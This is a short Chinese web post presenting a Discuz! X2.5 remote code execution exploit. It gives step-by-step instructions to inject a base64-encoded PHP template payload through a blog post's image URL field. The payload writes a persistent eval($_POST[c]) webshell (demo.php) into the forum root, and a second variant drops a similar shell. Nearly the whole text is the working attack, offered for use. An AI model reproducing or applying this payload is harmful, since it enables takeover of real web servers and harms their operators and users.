Discuz! X2.5 远程代码执行漏洞及EXP 0day

发布时间:2012-4.30 发布作者:佚名 漏洞类型:代码执行 漏洞描述:   1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码 <?php @eval($_POST[c]); ?>ok <?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?> 4.访问日志,论坛根目录下生成demo.php,一句发密码C

发表评论